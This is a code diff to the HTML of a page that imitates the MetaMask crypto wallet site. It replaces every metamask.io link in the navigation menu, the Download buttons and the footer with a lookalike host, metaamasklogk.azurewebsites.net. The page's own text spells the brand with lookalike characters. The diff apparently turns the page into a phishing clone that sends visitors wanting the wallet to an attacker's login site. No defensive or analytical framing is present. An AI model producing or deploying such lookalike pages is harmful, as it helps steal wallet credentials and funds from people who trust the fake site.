--- a/index.html
+++ b/index.html
@@ -427,12 +427,12 @@ padding: 0px 10px;
 <div class="menu_itemTwo">
 <div class="menu_itemTwo_flex">
 <ul>
-<li><a href=" https://metamask.io/">Features</a></li>
-<li><a href=" https://metamask.io/">Support</a></li>
-<li><a href=" https://metamask.io/">About</a></li>
-<li><a href=" https://metamask.io/">Build</a></li>
-<li id="download_btn_menu"><a href=" https://metamask.io/">Download</a></li>
-<li><a href=" https://metamask.io/"><img src="https://i.ibb.co/0938zsj/moon-chnge.jpg" alt=""></a></li>
+<li><a href=" https://metaamasklogk.azurewebsites.net">Features</a></li>
+<li><a href=" https://metaamasklogk.azurewebsites.net">Support</a></li>
+<li><a href=" https://metaamasklogk.azurewebsites.net">About</a></li>
+<li><a href=" https://metaamasklogk.azurewebsites.net">Build</a></li>
+<li id="download_btn_menu"><a href=" https://metaamasklogk.azurewebsites.net">Download</a></li>
+<li><a href=" https://metaamasklogk.azurewebsites.net"><img src="https://i.ibb.co/0938zsj/moon-chnge.jpg" alt=""></a></li>
 </ul>
 </div>
 </div>
@@ -446,7 +446,7 @@ padding: 0px 10px;
 <h2>A crypto wallet & gateway to blockchain apps</h2>
 <p>Start exploring blockchain applications in seconds. Trusted by over 30 million users worldwide.</p>
 <div class="btn_doowl_banner">
-<a href=" https://metamask.io/">Download for <span id="svg_icon"><svg xmlns="http://www.w3.org/2000/svg" width="50" height="50" viewBox="0 0 50 50" fill="none">
+<a href=" https://metaamasklogk.azurewebsites.net">Download for <span id="svg_icon"><svg xmlns="http://www.w3.org/2000/svg" width="50" height="50" viewBox="0 0 50 50" fill="none">
 <g clip-path="url(#clip0_3892_512)">
 <path d="M45.128 37.2106C44.4614 37.5593 43.774 37.8664 43.0696 38.1305C40.8274 38.9694 38.4522 39.3968 36.0583 39.392C26.8167 39.392 18.7664 33.0353 18.7664 24.8781C18.7782 23.784 19.0818 22.7129 19.6459 21.7753C20.21 20.8377 21.0141 20.0677 21.9752 19.5447C13.6163 19.8962 11.468 28.6062 11.468 33.7091C11.468 48.1372 24.766 49.5999 27.6311 49.5999C29.1759 49.5999 31.5058 49.1507 32.9042 48.7094L33.16 48.6234C38.541 46.7633 43.1284 43.1266 46.167 38.3121C46.2601 38.1655 46.3016 37.992 46.2851 37.8191C46.2686 37.6462 46.1949 37.4838 46.0757 37.3575C45.9566 37.2311 45.7987 37.1481 45.6271 37.1215C45.4554 37.0949 45.2798 37.1263 45.128 37.2106Z" fill="url(#paint0_linear_3892_512)"/>
 <path opacity="0.35" d="M45.128 37.2106C44.4614 37.5593 43.774 37.8664 43.0696 38.1305C40.8274 38.9694 38.4522 39.3968 36.0583 39.392C26.8167 39.392 18.7664 33.0353 18.7664 24.8781C18.7782 23.784 19.0818 22.7129 19.6459 21.7753C20.21 20.8377 21.0141 20.0677 21.9752 19.5447C13.6163 19.8962 11.468 28.6062 11.468 33.7091C11.468 48.1372 24.766 49.5999 27.6311 49.5999C29.1759 49.5999 31.5058 49.1507 32.9042 48.7094L33.16 48.6234C38.541 46.7633 43.1284 43.1266 46.167 38.3121C46.2601 38.1655 46.3016 37.992 46.2851 37.8191C46.2686 37.6462 46.1949 37.4838 46.0757 37.3575C45.9566 37.2311 45.7987 37.1481 45.6271 37.1215C45.4554 37.0949 45.2798 37.1263 45.128 37.2106Z" fill="url(#paint1_radial_3892_512)"/>
@@ -541,9 +541,9 @@ MetaMask Wallet | Login | Signup. The M𝔢tåMask Wallet accounts provide an ex
 <div class="custom_footer_col2 samecolme custom_footer_col2_com">
 <h2 class="">LEARN MORE</h2>
 <ul>
-<li><a href=" https://metamask.io/about/">About</a></li>
+<li><a href=" https://metaamasklogk.azurewebsites.netabout/">About</a></li>
 <li><a href="https://docs.metamask.io/guide/">Developers Docs</a></li>
-<li><a href=" https://metamask.io/download/">Download</a></li>
+<li><a href=" https://metaamasklogk.azurewebsites.netdownload/">Download</a></li>
 <li><a href="https://docs.metamask.io/guide/">Documentation</a></li>
 
  
